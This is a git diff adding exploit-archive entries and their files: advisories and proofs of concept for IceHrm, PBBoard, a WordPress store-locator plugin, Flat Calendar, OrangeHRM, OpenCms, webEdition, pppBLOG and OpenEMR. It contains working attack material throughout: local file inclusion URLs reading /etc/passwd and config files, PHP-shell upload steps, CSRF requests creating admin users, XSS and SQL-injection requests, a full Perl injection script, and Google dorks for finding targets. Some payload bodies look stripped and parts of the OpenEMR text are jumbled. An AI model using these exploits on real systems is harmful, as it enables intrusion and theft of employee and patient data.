diff --git a/files.csv b/files.csv index aa838193d..7b18abe82 100755 --- a/files.csv +++ b/files.csv @@ -31968,6 +31968,9 @@ id,file,description,date,author,platform,type,port 35487,platforms/php/dos/35487.php,"PHP 5.x OpenSSL Extension x Function openssl_decrypt Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0 35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure Vulnerability",2011-03-21,"Dan Rosenberg",osx,local,0 35489,platforms/multiple/dos/35489.pl,"Perl 5.x 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 +35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0 +35491,platforms/php/webapps/35491.txt,"PBBoard CMS - Stored XSS Vulnerability",2014-12-08,"Manish Tanwar",php,webapps,0 +35493,platforms/php/webapps/35493.txt,"Wordpress Ajax Store Locator 1.2 - Arbitrary File Download",2014-12-08,"Claudio Viviani",php,webapps,0 35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0 35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0 35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0 @@ -31977,9 +31980,15 @@ id,file,description,date,author,platform,type,port 35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0 35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0 +35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection Exploit",2014-12-09,"ZoRLu Bugrahan",php,webapps,0 35507,platforms/windows/dos/35507.pl,"DivX Player 7 Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0 35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 '.fp4f' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,windows,remote,0 35510,platforms/php/webapps/35510.txt,"Humhub <= 0.10.0-rc.1 - SQL Injection Vulnerability",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 35511,platforms/php/webapps/35511.txt,"Humhub <= 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 35512,platforms/windows/local/35512.txt,"Mobilis 3G mobiconnect 3G++ ZDServer 1.0.1.2 - (ZTE CORPORATION) Service Trusted Path Privilege Escalation",2014-12-10,s-dz,windows,local,0 +35514,platforms/php/webapps/35514.txt,"OrangeHRM 2.6.2 'jobVacancy.php' Cross Site Scripting Vulnerability",2011-03-27,"AutoSec Tools",php,webapps,0 +35515,platforms/php/webapps/35515.txt,"Alkacon OpenCms 7.5.x Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0 +35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0 +35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 'search.php' Cross Site Scripting Vulnerability",2011-03-28,"kurdish hackers team",php,webapps,0 +35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injection Vulnerabilities",2014-12-10,Portcullis,php,webapps,80 diff --git a/platforms/php/webapps/35490.txt b/platforms/php/webapps/35490.txt new file mode 100755 index 000000000..400848242 --- /dev/null +++ b/platforms/php/webapps/35490.txt @@ -0,0 +1,238 @@ +? +IceHrm <=7.1 Multiple Vulnerabilities + + +Vendor: IceHRM +Product web page: http://www.icehrm.com +Affected version: <= 7.1 + + +Summary: IceHrm is Human Resource Management web software +for small and medium sized organizations. The software is +written in PHP. It has community (free), commercial and +hosted (cloud) solution. + +Desc: IceHrm <= 7.1 suffers from multiple vulnerabilities +including Local File Inclusion, Cross-Site Scripting, Malicious +File Upload, Cross-Site Request Forgery and Code Execution. + +Tested on: Apache/2.2.15 (Unix) + PHP/5.3.3 + MySQL 5.1.73 + + +Vulnerabilities discovered by Stefan 'sm' Petrushevski + @zeroscience + + +Advisory ID: ZSL-2014-5215 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php + + +01.12.2014 + +--- + + +1. Local File Inclusion (LFI) +##################################################### +File: +app/index.php + +Vulnerable code: +---- snip ---- +include APP_BASE_PATH.'/'.$group.'/'.$name.'/index.php'; +app/?g=../&n=../../../../etc/passwd%00 +---- snip ---- + +Proof of Concept (PoC): +http://zsltest/icehrm/app/?g=../&n=../../../../etc/passwd%00 + +Severity: CRITICAL +##################################################### + + +2. Local File Inclusion (LFI) +##################################################### +File: +service.php + +Vulnerable code: +---- snip ---- +if($action == 'download'){ + $fileName = $_REQUEST['file']; + $fileName = CLIENT_BASE_PATH.'data/'.$fileName; + header('Content-Description: File Transfer'); + header('Content-Type: application/octet-stream'); + header('Content-Disposition: attachment; filename='.basename($fileName)); + header('Content-Transfer-Encoding: binary'); + header('Expires: 0'); + header('Cache-Control: must-revalidate'); + header('Pragma: public'); + header('Content-Length: ' . filesize($fileName)); + ob_clean(); + flush(); + readfile($fileName); +---- snip ---- + +Proof of Concept (PoC): +http://zsltest/icehrm/app/service.php?a=download&file=../config.php + +Severity: CRITICAL +##################################################### + + +3. Malicious File Upload / Code Execution +##################################################### +File: +fileupload.php + +Vulnerable code: +---- snip ---- +//Generate File Name +$saveFileName = $_POST['file_name']; +if(empty($saveFileName) || $saveFileName == "_NEW_"){ + $saveFileName = microtime(); + $saveFileName = str_replace(".", "-", $saveFileName); +} + +$file = new File(); +$file->Load("name = ?",array($saveFileName)); + +// list of valid extensions, ex. array("jpeg", "xml", "bmp") + +$allowedExtensions = explode(',', "csv,doc,xls,docx,xlsx,txt,ppt,pptx,rtf,pdf,xml,jpg,bmp,gif,png,jpeg"); +// max file size in bytes +$sizeLimit =MAX_FILE_SIZE_KB * 1024; +$uploader = new qqFileUploader($allowedExtensions, $sizeLimit); +$result = $uploader->handleUpload(CLIENT_BASE_PATH.'data/',$saveFileName); +// to pass data through iframe you will need to encode all html tags + +if($result['success'] == 1){ + $file->name = $saveFileName; + $file->filename = $result['filename']; + $file->employee = $_POST['user']=="_NONE_"?null:$_POST['user']; + $file->file_group = $_POST['file_group']; + $file->Save(); + $result['data'] = CLIENT_BASE_URL.'data/'.$result['filename']; + $result['data'] .= "|".$saveFileName; + $result['data'] .= "|".$file->id; +} +---- snip ---- + +Proof of Concept (PoC) method: +1. Change the 'file_name' request parameter in desired filename. The file will be saved in 'data' folder. +Example: file_name = dsadsa.php ==will be saved in==> data/dsadsa.php.txt +2. Create a malicious file (php shell) save it with .txt extension +3. Upload the malicious file (php shell) via the upload form in fileupload_page.php. The file will appear in ‘data’ folder as dsadsa.php.txt. +4. Access the file – http://zsltest/icehrm/data/dsadsa.php.txt to execute the php code. + +PoC example: +1. http://zsltest/icehrm/app/fileupload_page.php?id=xxx.php&msg=Upload%20Attachment&file_group=EmployeeDocument&file_type=all&user=1 +2. xxx.txt contents: + +3. Upload the filename +4. Access the file: + +Severity: CRITICAL +##################################################### + + +4. Cross-Site Scripting (XSS) +##################################################### +File: +login.php + +Vulnerable code: +---- snip ---- + + +Severity: MEDIUM +##################################################### + + +5. Cross-Site Scripting (XSS) +##################################################### +File: +fileupload_page.php + +Vulnerable code: +---- snip ---- +
+
+ + + + +… +---- snip ---- + +Vulnerable parameters: id, file_group, user, msg + +Proof of Concept (PoC): +http://zsltest/icehrm/fileupload_page.php?id=XXXX%22%3E%3Cscript%3Ealert(‘zsl’)%3C/script%3E + +Severity: MEDIUM +##################################################### + + +6. Information Disclosure / Leaking Sensitive User Info +##################################################### +Users’/employees’ profile images are easily accessible in the ‘data’ folder. + +Proof of Concept (PoC): +http://192.168.200.119/icehrm/app/data/profile_image_1.jpg +http://192.168.200.119/icehrm/app/data/profile_image_X.jpg <- x=user id + +Severity: LOW +##################################################### + + +7. Cross-Site Request Forgery (CSRF) +##################################################### +All forms are vulnerable to CSRF. + +Documents library: +http://localhost/icehrm/app/service.php +POST +document=2&valid_until=&status=Inactive&details=detailz&attachment=attachment_evi4t3VuKqDfyY&a=add&t=EmployeeDocument + +Personal info: +http://localhost/icehrm/app/service.php +GET +t=Employee +a=ca +sa=get +mod=modules=employees +req={"map":"{\"nationality\":[\"Nationality\",\"id\",\"name\"],\"employment_status\":[\"EmploymentStatus\",\"id\",\"name\"],\"job_title\":[\"JobTitle\",\"id\",\"name\"],\"pay_grade\":[\"PayGrade\",\"id\",\"name\"],\"country\":[\"Country\",\"code\",\"name\"],\"province\":[\"Province\",\"id\",\"name\"],\"department\":[\"CompanyStructure\",\"id\",\"title\"],\"supervisor\":[\"Employee\",\"id\",\"first_name+last_name\"]}"} + +Add new admin user: +http://localhost/icehrm/app/service.php +POST +username=test5&email=test5%40zeroscience.mk&employee=1&user_level=Admin&a=add&t=User + +Change password of user: +http://localhost/icehrm/app/service.php? +GET +t=User +a=ca +sa=changePassword +mod=admin=users +req={"id":5,"pwd":"newpass"} + +Add/edit modules: +http://localhost/icehrm/app/service.php +POST +t=Module&a=get&sm=%7B%7D&ft=&ob= + +Severity: LOW +##################################################### diff --git a/platforms/php/webapps/35491.txt b/platforms/php/webapps/35491.txt new file mode 100755 index 000000000..3afa6405c --- /dev/null +++ b/platforms/php/webapps/35491.txt @@ -0,0 +1,84 @@ +############################################################################## +# Exploit Title : PBBoard CMS Stored xss vulnerability +# Author : Manish Kishan Tanwar +# Vendor : http://www.pbboard.info/ +# version affected: all +# Date : 7/12/2014 +# Discovered @ : INDISHELL Lab +# Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti +# email : manish.1046@gmail.com +############################################################################## +//////////////////////// +/// Overview: +//////////////////////// +Program PBBoard is interactive Forum management program Dialogic +Free classified software Free and open source. +/////////////////////////////// +// Vulnerability Description: +/////////////////////////////// + +Stored xss vulnerability exist in "send private message" module, a user can send xss crafted private message to other user, and when reciever will open the message xss payload will execute + +////////////////////////////// +/// Proof of Concept: - +////////////////////////////// + +go to "inbox", click "compose message" +type username, title and message body , intercept the request and change the +content of "text" parameter with xss payload +when reciever will open the message, xss payload will execute + +Proof image:- http://oi57.tinypic.com/112d5cx.jpg + +////////////////////// +///Demo POC Request/// +////////////////////// + +POST /PBBoard_v3.0.1/index.php?page=pm_send&send=1&start=1 HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/PBBoard_v3.0.1/index.php?page=pm_send&send=1&index=1&username=ica +Cookie: PowerBB_lastvisit=1417951132; PowerBB_username=ica; PowerBB_password=8a2d334536b2f4146af8cf46acd85110; security_level=0;PHPSESSID=thouojqch98pigioioepn8n2h1 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------147872036312473 +Content-Length: 670 + +-----------------------------147872036312473 +Content-Disposition: form-data; name="to[]" + +ica +-----------------------------147872036312473 +Content-Disposition: form-data; name="title" + +hi +-----------------------------147872036312473 +Content-Disposition: form-data; name="text" + +hii
// +-----------------------------147872036312473 +Content-Disposition: form-data; name="icon" + +look/images/icons/i1.gif +-----------------------------147872036312473 +Content-Disposition: form-data; name="insert" + +Save +-----------------------------147872036312473-- + + + + --==[[ Greetz To ]]==-- +############################################################################################ +#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, +#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, +#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, +#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk +############################################################################################# + --==[[Love to]]==-- +# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, +#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik) + --==[[ Special Fuck goes to ]]==-- + <3 suriya Cyber Tyson <3 \ No newline at end of file diff --git a/platforms/php/webapps/35493.txt b/platforms/php/webapps/35493.txt new file mode 100755 index 000000000..358638426 --- /dev/null +++ b/platforms/php/webapps/35493.txt @@ -0,0 +1,41 @@ +###################### + +# Exploit Title : Wordpress Ajax Store Locator <= 1.2 Arbitrary File Download + +# Exploit Author : Claudio Viviani + +# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356 + +# Software Link : Premium + +# Dork Google: inurl:ajax-store-locator +# index of ajax-store-locator + +# Date : 2014-12-06 + +# Tested on : Windows 7 / Mozilla Firefox +# Linux / Mozilla Firefox + +###################### + +# PoC Exploit: + +http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../somefile] + +"download_file" variable is not sanitized. + + +##################### + +Discovered By : Claudio Viviani + http://www.homelab.it + + info@homelab.it + homelabit@protonmail.ch + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww + +##################### \ No newline at end of file diff --git a/platforms/php/webapps/35506.pl b/platforms/php/webapps/35506.pl new file mode 100755 index 000000000..ef087c9d1 --- /dev/null +++ b/platforms/php/webapps/35506.pl @@ -0,0 +1,130 @@ +#!/usr/bin/perl -w +#Title : Flat Calendar v1.1 HTML Injection Exploit +#Download : http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip +#Author : ZoRLu / zorlu@milw00rm.com +#Website : http://milw00rm.com / its online +#Twitter : https://twitter.com/milw00rm or @milw00rm +#Test : Windows7 Ultimate +#Date : 08/12/2014 +#Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others +#BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) ) +#Dork1 : intext:"Flat Calendar is powered by Flat File DB" +#Dork2 : inurl:"viewEvent.php?eventNumber=" +# +#C:\Users\admin\Desktop>perl flat.pl +# +#Usage: perl flat.pl http://server /calender_path/ indexfile nickname +#Exam1: perl flat.pl http://server / index.html ZoRLu +#Exam2: perl flat.pl http://server /calendar/ index.html ZoRLu +# +#C:\Users\admin\Desktop>perl flat.pl http://server /member_content/diaries/womens/calendar/ index.html ZoRLu +# +#[+] Target: http://server +#[+] Path: /member_content/diaries/womens/calendar/ +#[+] index: index.html +#[+] Nick: ZoRLu +#[+] Exploit Succes +#[+] Searching url... +#[+] YourEventNumber = 709 +#[+] http://server/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709 + +use HTTP::Request::Common qw( POST ); +use LWP::UserAgent; +use IO::Socket; +use strict; +use warnings; + +sub hlp() { + +system(($^O eq 'MSWin32') ? 'cls' : 'clear'); +print "\nUsage: perl $0 http://server /calender_path/ indexfile nickname\n"; +print "Exam1: perl $0 http://server / index.html ZoRLu\n"; +print "Exam2: perl $0 http://server /calendar/ index.html ZoRLu\n"; + +} + +if(@ARGV != 4) { + +hlp(); +exit(); + +} + +my $ua = LWP::UserAgent->new; +my $url = $ARGV[0]; +my $path = $ARGV[1]; +my $index = $ARGV[2]; +my $nick = $ARGV[3]; +my $vuln = $url . $path . "admin/calAdd.php"; + +print "\n[+] Target: ".$url."\n"; +print "[+] Path: ".$path."\n"; +print "[+] index: ".$index."\n"; +print "[+] Nick: ".$nick."\n"; + +my @months = qw(January February March April May June July August September October November December); +my ($day, $month, $yearset) = (localtime)[3,4,5]; +my $year = 1900 + $yearset; +my $moon = $months[$month]; + +if (open(my $fh, $index)) { + +while (my $row = <$fh>) { +chomp $row; + +my $req = POST $vuln, [ + event => 'Test Page', + description => $row, + month => $moon, + day => $day, + year => $year, + submitted => $nick, +]; + + +my $resp = $ua->request($req); +if ($resp->is_success) { + my $message = $resp->decoded_content; + my $regex = "Record Added: taking you back"; + if ($message =~ /$regex/) { + print "[+] Exploit Succes\n"; + + my $newua = LWP::UserAgent->new( ); + my $newurl = $url . $path . "calendar.php"; + my $newreq = $newua->get($newurl); + if ($newreq->is_success) { + my $newmessage = $newreq->decoded_content; + + my $first = rindex($newmessage,"viewEvent.php?eventNumber="); + print "[+] Searching url...\n"; + my $request = substr($newmessage, $first+26, 4); + print "[+] YourEventNumber = $request\n"; + sleep(1); + print "[+] ".$url.$path."viewEvent.php?eventNumber=".$request."\n"; + + } + +else { + print "[-] HTTP POST error code: ", $newreq->code, "\n"; + print "[-] HTTP POST error message: ", $newreq->message, "\n"; +} + + } + else { + + print "[-] Exploit Failed"; + + } +} +else { + print "[-] HTTP POST error code: ", $resp->code, "\n"; + print "[-] HTTP POST error message: ", $resp->message, "\n"; + } + } +} +else { + +sleep(1); +die ("[-] NotFound: $index\n"); + +} \ No newline at end of file diff --git a/platforms/php/webapps/35514.txt b/platforms/php/webapps/35514.txt new file mode 100755 index 000000000..28e0fb92d --- /dev/null +++ b/platforms/php/webapps/35514.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47046/info + +OrangeHRM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +OrangeHRM 2.6.2 is vulnerable; other versions may also be affected. + +http://www.example.com/orangehrm-2.6.2/templates/recruitment/jobVacancy.php?recruitcode=%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35515.txt b/platforms/php/webapps/35515.txt new file mode 100755 index 000000000..b9051eef3 --- /dev/null +++ b/platforms/php/webapps/35515.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/47055/info + +Alkacon OpenCms is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Versions prior to OpenCms 7.5.4 are vulnerable. + +http://www.example.com/opencms/opencms/system/workplace/commons/report-locks.jsp?resourcelist=null&resource=/demo_de&includerelated=false">XSSvector + +http://www.example.com/opencms/opencms/system/workplace/views/explorer/contextmenu.jsp?resourcelist=/deco_logo.png&acttarget=514f2">XSSvector \ No newline at end of file diff --git a/platforms/php/webapps/35516.txt b/platforms/php/webapps/35516.txt new file mode 100755 index 000000000..015f5b2e5 --- /dev/null +++ b/platforms/php/webapps/35516.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/47065/info + +webEdition CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to view and execute arbitrary local files in the context of the webserver process. This may aid in further attacks. + +webEdition CMS 6.1.0.2 is vulnerable; other versions may also be affected. + +http://www.example.com/webEdition/index.php?DOCUMENT_ROOT= [lfi]%00 +http://www.example.com/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]%00 \ No newline at end of file diff --git a/platforms/php/webapps/35517.txt b/platforms/php/webapps/35517.txt new file mode 100755 index 000000000..c3fb15687 --- /dev/null +++ b/platforms/php/webapps/35517.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47068/info + +pppBLOG is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +pppBLOG 0.3.0 is vulnerable; other versions may also be affected. + +http://www.example.com/search.php?q= \ No newline at end of file diff --git a/platforms/php/webapps/35518.txt b/platforms/php/webapps/35518.txt new file mode 100755 index 000000000..bdf13512d --- /dev/null +++ b/platforms/php/webapps/35518.txt @@ -0,0 +1,268 @@ +Vulnerability title: Multiple Authenticated SQL Injections In OpenEMR +CVE: CVE-2014-5462 +Vendor: OpenEMR +Product: OpenEMR +Affected version: 4.1.2(7) and earlier +Fixed version: N/A +Reported by: Jerzy Kramarz +Details: + +SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. + +The following URLs and parameters have been confirmed to suffer from Multiple SQL injections: + +Request 1 + +POST /openemr/interface/super/edit_layout.php HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: OpenEMR=nq2h24dbqlcgee1rlrk3ufutq7 +[...] +Content-Length: 134 + +formaction=&deletefieldid=&deletefieldgroup=&deletegroupname=&movegroupname=&movedirection=&selectedfields=&targetgroup=&layout_id=HIS + + +Request 2 + +POST /openemr/interface/reports/prescriptions_report.php HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0 +[...] +Content-Length: 135 + +form_refresh=true&form_facility=&form_from_date=2014-01-01&form_to_date=2014-07-25&form_patient_id=1&form_drug_name=a&form_lot_number=1 + + +Request 3 + +POST /openemr/interface/billing/edit_payment.php HTTP/1.1 +Host: 192.168.56.102 +[...] +Content-Length: 186 +Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en + +CountIndexAbove=0&ActionStatus=&CountIndexBelow=0&after_value=&DeletePaymentDistributionId=&hidden_type_code=&ajax_mode=&payment_id=1&method=enable HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0 +Connection: keep-alive + + +Request 5 + +POST /openemr/interface/billing/sl_eob_search.php HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en + +----------1034262177 +Content-Disposition: form-data; name="form_pid" + +5 +----------1034262177 +Content-Disposition: form-data; name="form_without" + +on +----------1034262177 +Content-Disposition: form-data; name="form_deposit_date" + +5 +----------1034262177 +Content-Disposition: form-data; name="form_paydate" + +5 +----------1034262177 +Content-Disposition: form-data; name="form_category" + +All +----------1034262177 +Content-Disposition: form-data; name="form_erafile"; filename="file.txt" +Content-Type: text/plain + +boom +----------1034262177 +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +5000000 +----------1034262177 +Content-Disposition: form-data; name="form_amount" + +5 +----------1034262177 +Content-Disposition: form-data; name="form_encounter" + +5 +----------1034262177 +Content-Disposition: form-data; name="form_to_date" + +5 +----------1034262177 +Content-Disposition: form-data; name="form_payer_id" + +2 +----------1034262177 +Content-Disposition: form-data; name="form_source" + +5 +----------1034262177 +Content-Disposition: form-data; name="form_name" + +BOOOM +----------1034262177 +Content-Disposition: form-data; name="form_search" + +Search +----------1034262177 +Content-Disposition: form-data; name="form_date" + +5-5-5 +----------1034262177-- + + + +Request 6 + +GET /openemr/interface/logview/logview.php?end_date=2014-07-25&sortby=&csum=&event=&check_sum=on&start_date=2014-07-25&type_event=select&eventname=login HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en + + +Request 7 + +POST /openemr/interface/orders/procedure_stats.php HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0 + +form_sexes=1&form_to_date=2014-07-25&form_by=5&form_submit=Submit&form_show%5b%5d=.age&form_output=2&form_facility=4&form_from_date=0000-00- + + +Request 8 + +POST /openemr/interface/orders/pending_followup.php HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0; pma_theme=original + +form_to_date=2014-07-25&form_refresh=Refresh&form_facility=5&form_from_date=2014-07-25 + + +Request 9 + +POST /openemr/interface/orders/pending_orders.php HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5 + +form_to_date=2014-07-25&form_refresh=Refresh&form_facility=4&form_from_date=2014-07-25 + + +Request 10 + +POST /openemr/interface/patient_file/deleter.php?patient=&encounterid=&formid=&issue=&document=&payment=&billing=&transaction= HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: OpenEMR=kpqal2o1e4am9eh0lce5qt3ab0 + +form_submit=Yes%2c+Delete+and+Log + + +Request 11 + +POST /openemr/interface/patient_file/encounter/coding_popup.php HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154 + +Search+Results=&newcodes=&bn_search=Search&ProviderID=1&search_type=CPT4&search_term=5 + + +Request 12 + +POST /openemr/interface/patient_file/encounter/search_code.php?type= HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154 + +text=5&form_addr2=1&form_attn=5&form_country=U&form_freeb_type=2&form_phone=555-555-5555&form_partner=&form_name=P&form_zip=36&form_save=Save+as+New&form_state=W&form_city=W&form_cms_id=5 + + +Request 14 + +POST /openemr/interface/patient_file/problem_encounter.php HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: OpenEMR=p0locr2jieuagul105rkm95ob6 + +form_pelist=%2f&form_pid=0&form_save=Save&form_key=e + + +Request 15 + +POST /openemr/interface/reports/appointments_report.php HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5 + +form_show_available=on&form_refresh=&form_to_date=2014-07-25&patient=&form_provider=1&form_apptstatus=&with_out_facility=on&form_facility=4&form_apptcat=9&form_from_date=2014-07-25&with_out_provider=on&form_orderby=date + + +Request 16 + +POST /openemr/interface/patient_file/summary/demographics_save.php HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6; pma_lang=en; pma_collation_connection=utf8_general_ci + +form_i2subscriber_employer_country=USA&i3subscriber_DOB=0000-00-00&i3accept_assignment=FALSE&i3subscriber_city=Winterville&form_hipaa_mail=NO&form_allow_imm_info_share=NO&form_street=5&i3effective_date=0000-00-00&form_i1subscriber_state=AL&form_interpretter=5&i1subscriber_lname=boom&form_title=Mr.&i1subscriber_fname=boom&form_fname=Asd&form_i1subscriber_employer_state=AL&form_i1subscriber_relationship=self&form_i1subscriber_country=USA&form_i3subscriber_employer_state=AL&form_contact_relationship=5&form_mothersname=boom&i2group_number=5&form_em_state=AL&form_i3subscriber_country=USA&form_allow_patient_portal=NO&i2copay=5&i2policy_number=5&form_i2subscriber_sex=Female&i1accept_assignment=FALSE&i3subscriber_postal_code=SW1A+1AA&i2subscriber_ss=5&i1subscriber_mname=boom&form_pharmacy_id=0&i3subscriber_phone=5&form_phone_home=5&form_lname=Asd&mode=save&form_i2subscriber_country=USA&i2subscriber_employer=5&db_id=1 &form_i1subscriber_employer_country=USA&form_d + eceased_reason=5&form_i2subscriber_state=AL&form_city=Winterville&form_email=winter@example.com&i3subscriber_employer_street=5&form_genericval2=asd&i3group_number=5&form_em_street=5&form_genericval1=asd&form_language=armenian&i1provider=&i2provider=&form_em_city=Winterville&form_em_name=boom&i3subscriber_fname=boom&form_race=amer_ind_or_alaska_native&i1plan_name=boom&i3subscriber_employer_city=Winterville&form_pubpid=asd&form_mname=Asd&i2subscriber_employer_street=5&form_financial_review=0000-00-00+00%3a00%3a00&i3subscriber_mname=boom&i3provider=&i3subscriber_employer_postal_code=SW1A+1AA&form_country_code=USA&form_em_country=USA&i2subscriber_phone=5&i3policy_number=5&form_status=married&form_ss=asdasd&form_monthly_income=01&i1effective_date=0000-00-00&form_i2subscriber_relationship=self&i3plan_name=boom&i1subscriber_employer_street=5&i1subscriber_city=Winterville&form_allow_imm_reg_use=NO&form_drivers_license=asd&form_i3subscriber_employer_country=USA&form_em_postal_code=SW + 